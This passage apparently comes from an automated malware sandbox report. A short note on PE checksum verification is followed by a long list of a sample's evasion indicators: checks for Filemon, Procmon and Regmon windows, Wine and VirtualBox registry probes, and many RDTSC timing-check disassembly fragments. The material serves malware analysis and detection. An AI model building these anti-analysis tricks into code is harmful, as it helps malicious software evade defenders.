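    print("stored/computed before patch:", verify_pe_checksum(image))
    print("stored/computed after patch: ", verify_pe_checksum(patch_checksum(image)))
```

Run against a real file by passing `open(path, "rb").read()` to `verify_pe_checksum`; a stored value of 0 means the linker never set one, while a non-zero stored value that differs from the computed one is the condition the report flags. The checksum is not a security control (anything that rewrites the file can also fix the field, as `patch_checksum` shows), so treat it as a triage signal for post-build modification, not as integrity protection.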

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13421)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D302D second address: 9D3039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F242906E926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D2928 second address: 9D2942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B53h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D5360 second address: 9D5364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D5364 second address: 9D53DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2429065B48h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dx, FEBEh 0x00000030 jmp 00007F2429065B52h 0x00000035 push 00000000h 0x00000037 jmp 00007F2429065B53h 0x0000003c and di, 39A3h 0x00000041 call 00007F2429065B49h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F2429065B4Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D53DC second address: 9D5461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F242906E928h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jng 00007F242906E935h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F242906E936h 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jng 00007F242906E93Ch 0x0000002c push edx 0x0000002d jnl 00007F242906E926h 0x00000033 pop edx 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D5461 second address: 9D5465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D5465 second address: 9D54D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jno 00007F242906E92Ch 0x0000000e movsx esi, di 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2663h], edx 0x00000019 mov ecx, esi 0x0000001b push 00000000h 0x0000001d mov edx, dword ptr [ebp+122D3495h] 0x00000023 push 00000003h 0x00000025 movsx esi, cx 0x00000028 push 4A96893Dh 0x0000002d jnl 00007F242906E92Eh 0x00000033 add dword ptr [esp], 756976C3h 0x0000003a call 00007F242906E92Bh 0x0000003f mov cx, 32FDh 0x00000043 pop edx 0x00000044 lea ebx, dword ptr [ebp+12456FA5h] 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F242906E931h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D54D7 second address: 9D54EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2429065B4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B9828 second address: 9B9836 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F242906E926h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B9836 second address: 9B983C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B983C second address: 9B9840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B9840 second address: 9B984A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2429065B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46DF second address: 9F46E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46E3 second address: 9F46E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46E9 second address: 9F46EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46EF second address: 9F46F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4846 second address: 9F484D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F484D second address: 9F4866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2429065B46h 0x0000000a popad 0x0000000b push ecx 0x0000000c jc 00007F2429065B46h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4CA4 second address: 9F4CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4DD7 second address: 9F4DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4F60 second address: 9F4F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4F64 second address: 9F4F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50F5 second address: 9F50FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F53EC second address: 9F5402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2429065B4Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5402 second address: 9F5406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57C9 second address: 9F57D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57D0 second address: 9F57E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E92Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57E4 second address: 9F57F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57F2 second address: 9F5849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jnc 00007F242906E940h 0x0000000d jmp 00007F242906E938h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F242906E936h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5983 second address: 9F5987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5987 second address: 9F59B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F242906E94Bh 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F242906E937h 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F3B second address: 9F5F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B56h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F60CD second address: 9F60E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F242906E938h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F63A0 second address: 9F63C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F2429065B46h 0x00000014 jmp 00007F2429065B53h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F63C7 second address: 9F63CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB210 second address: 9FB22A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B55h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1A8 second address: 9CC1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1AF second address: 9CC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2429065B46h 0x0000000a popad 0x0000000b js 00007F2429065B4Eh 0x00000011 jne 00007F2429065B46h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F2429065B52h 0x00000021 pushad 0x00000022 jmp 00007F2429065B4Eh 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1F0 second address: 9CC1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1F8 second address: 9CC1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1FE second address: 9CC204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE573 second address: 9FE5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F2429065B56h 0x0000000f pushad 0x00000010 js 00007F2429065B46h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jc 00007F2429065B57h 0x00000024 push ebx 0x00000025 jmp 00007F2429065B4Fh 0x0000002a pop ebx 0x0000002b mov eax, dword ptr [eax] 0x0000002d push edx 0x0000002e jmp 00007F2429065B4Dh 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 pushad 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD64C second address: 9FD650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A028D5 second address: A028DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B61DE second address: 9B61E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B61E8 second address: 9B6216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2429065B62h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jp 00007F2429065B46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D2A second address: A01D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F242906E926h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D4D second address: A01D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D56 second address: A01D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D64 second address: A01D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D68 second address: A01D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F242906E92Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F242906E939h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D95 second address: A01D9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01F2C second address: A01F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02586 second address: A0258A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0258A second address: A025AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F242906E938h 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A025AF second address: A025CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2429065B50h 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F2429065B46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A025CF second address: A025DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F242906E926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05082 second address: A050A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2429065B54h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A050A5 second address: A050BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F242906E92Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A050BF second address: A050DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2429065B50h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C33 second address: A05C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 pushad 0x00000008 movsx edx, dx 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C44 second address: A05C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05E5B second address: A05E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F4E second address: A05F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F52 second address: A05F58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F58 second address: A05F5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06106 second address: A0610C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0610C second address: A06122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06122 second address: A06127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0667E second address: A06682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06682 second address: A06686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08AD1 second address: A08AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A087C1 second address: A087CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08AD5 second address: A08AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2429065B46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A094F1 second address: A09576 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F242906E933h 0x00000008 jmp 00007F242906E92Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnp 00007F242906E93Ch 0x00000016 js 00007F242906E936h 0x0000001c jmp 00007F242906E930h 0x00000021 nop 0x00000022 push 00000000h 0x00000024 call 00007F242906E92Eh 0x00000029 mov dword ptr [ebp+122D2E9Ah], edi 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F242906E928h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D34F1h] 0x00000052 add dword ptr [ebp+122D2696h], ecx 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09576 second address: A0957A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A092A0 second address: A092B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F242906E92Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0957A second address: A09598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A092B5 second address: A092BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09598 second address: A0959C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0959C second address: A095BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F242906E930h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F242906E926h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB28 second address: A0AB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB2E second address: A0AB8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E934h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F242906E933h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F242906E928h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+1245D012h], ebx 0x00000036 push 00000000h 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
